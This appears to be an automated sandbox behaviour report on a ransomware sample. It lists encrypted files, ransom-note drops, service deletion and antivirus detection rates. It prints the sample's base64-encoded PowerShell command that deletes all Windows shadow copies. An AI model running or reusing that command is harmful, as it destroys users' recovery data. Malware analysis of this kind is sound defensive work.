        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.en-us.xml entropy: 7.9941039851
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.es-es.xml entropy: 7.99227189142
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Proof.Culture.msi.16.fr-fr.xml entropy: 7.99234212172
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.Word.Word.x-none.msi.16.x-none.xml entropy: 7.99767709373
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.shared.Office.x-none.msi.16.x-none.xml entropy: 7.9996976551
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.wordmui.msi.16.en-us.xml entropy: 7.9976493118
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man entropy: 7.99840560253
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man entropy: 7.99982474514
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Diagnosis\DownloadedScenarios\windows.uif_ondemand.xml.inbox entropy: 7.99983276889
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json entropy: 7.99873104138
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json entropy: 7.99705749189
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.diffbase entropy: 7.99991094238
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.json entropy: 7.99984160939
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs entropy: 7.99985625911
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Network\Downloader\edbres00002.jrs entropy: 7.99985180608
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log entropy: 7.99985241907
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\customizations.xml entropy: 7.99974524212
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Provisioning\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\customizations.xml entropy: 7.99709445927
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log entropy: 7.99729335988
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log entropy: 7.99719387706
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs entropy: 7.99749086661
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs entropy: 7.99724488852
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log entropy: 7.99684233625
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db entropy: 7.99906630249
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml entropy: 7.9902279179
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml entropy: 7.99779185034
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml entropy: 7.99762686254
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml entropy: 7.9975256659
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml entropy: 7.99731403336
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml entropy: 7.99778743988
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml entropy: 7.99714622368
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.20 entropy: 7.9993281305
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.55 entropy: 7.99960688708
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.5B entropy: 7.99991665227
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.67 entropy: 7.99999784835
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.6C entropy: 7.99993528678
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.70 entropy: 7.99972547794
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.79 entropy: 7.99999160846
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.7C entropy: 7.99997659688
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.80 entropy: 7.99999282148
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.7E entropy: 7.99998809045
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.CE entropy: 7.99936781303
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.83 entropy: 7.9999135758
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db entropy: 7.99959133538
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.87 entropy: 7.99990990219
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-DF68D8AF8DD2A31618D3153E051D9824853D99C8.bin.A0 entropy: 7.99998377857
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg entropy: 7.99965856165
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-05232019-141526-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99047105705
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-111255-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.9909613313
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-112839-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99269092072
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-113538-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99471179936
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07122018-122428-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99020848604
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-07172018-100840-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99451545267
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11212018-142246-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99246875976Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11222018-045846-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99032216592Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11222018-134305-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99000439307Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-11222018-135121-7-5f-17134.1.amd64fre.rs4_release.180410-1804.etl entropy: 7.99060429314Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Oracle\Java\installcache\baseimagefam8 entropy: 7.99999698116Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png entropy: 7.99859625209Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png entropy: 7.99679702649Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png entropy: 7.99376876374Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png entropy: 7.99557473476Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png entropy: 7.99878851991Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png entropy: 7.99380167711Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl entropy: 7.99896469667Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db entropy: 7.99130786141Jump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile created: C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime.xml entropy: 7.99961243297Jump to dropped file

        System Summary:

        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B93839 OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle, | 0_2_00B93839
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B9B1B1 | 0_2_00B9B1B1
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B97D86 | 0_2_00B97D86
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B97FE4 | 0_2_00B97FE4
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B9A51C | 0_2_00B9A51C
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B98507 | 0_2_00B98507
        Source: classification engine | Classification label: mal100.rans.evad.winEXE@5/697@0/0
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B948DE GetDriveTypeW,GetDiskFreeSpaceExW, | 0_2_00B948DE
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00B9500F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW, | 0_2_00B9500F
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\program files\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\356kf7c535-readme.txt
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\B6CC837D-86BE-A32B-F1A9-2E0B99BA279D
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\windows defender advanced threat protection\temp\356kf7c535-readme.txt
        Source: zA1pLzHWuQ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File read: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: zA1pLzHWuQ.exe | Virustotal: Detection: 68%
        Source: zA1pLzHWuQ.exe | ReversingLabs: Detection: 81%
        Source: unknown | Process created: C:\Users\user\Desktop\zA1pLzHWuQ.exe 'C:\Users\user\Desktop\zA1pLzHWuQ.exe'
        Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: unknown | Process created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
        Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Directory created: c:\program files\356kf7c535-readme.txt
        Source: Binary string: SecurityHealthAgent.pdbHeal source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: WscApi.pdbl source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: wscsvc.pdbl source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: shellext.pdbhServic source: zA1pLzHWuQ.exe, 00000000.00000003.826589379.0000000003127000.00000004.00000040.sdmp
        Source: Binary string: WscApi.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdbdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthService.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityCenterBroker.pdbbc source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: WscIsvIf.pdbityCent source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: shellext.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: WscIsvIf.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: WscApi.pdb! source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityCenterBroker.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdbal source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityCenterBroker.pdbb. source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdbpdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdb.pdbc source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthSSO.pdb.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.823640509.0000000003102000.00000004.00000040.sdmp
        Source: Binary string: wscsvc.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: wscui.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: Binary string: SecurityHealthAgent.pdb source: zA1pLzHWuQ.exe, 00000000.00000003.824728196.000000000311D000.00000004.00000040.sdmp
        Source: zA1pLzHWuQ.exe | Static PE information: section name: .i6x
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | Code function: 0_2_00BA3139 push esi; retf | 0_2_00BA313A
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: C:\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\program files\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\program files (x86)\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\recovery\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\dbg\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft onedrive\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\oracle\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\packages\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\regid.1991-06.com.microsoft\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\softwaredistribution\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\usoprivate\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\usoshared\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\windowsholographicdevices\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\user\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\public\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\arm\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\adobe\setup\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\appv\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\clicktorun\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\crypto\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\device stage\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\devicesync\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\diagnosis\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\drm\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\event viewer\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\identitycrl\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\mapdata\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\mf\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\netframework\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\network\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\office\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\provisioning\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\search\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\settings\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\smsrouter\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\spectrum\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\speech_onecore\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\storage health\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\uev\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\user account pictures\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\vault\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\wdf\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\windows defender\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\windows defender advanced threat protection\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\windows nt\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\windows security health\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\winmsipc\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft\wwansvc\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\microsoft onedrive\setup\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\oracle\java\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\packages\microsoft.microsoft3dviewer_8wekyb3d8bbwe\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\packages\microsoft.microsoftofficehub_8wekyb3d8bbwe\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\packages\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\usoprivate\updatestore\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\usoshared\logs\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\programdata\windowsholographicdevices\spatialstore\356kf7c535-readme.txt
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exe | File created: c:\users\default\desktop\356kf7c535-readme.txt
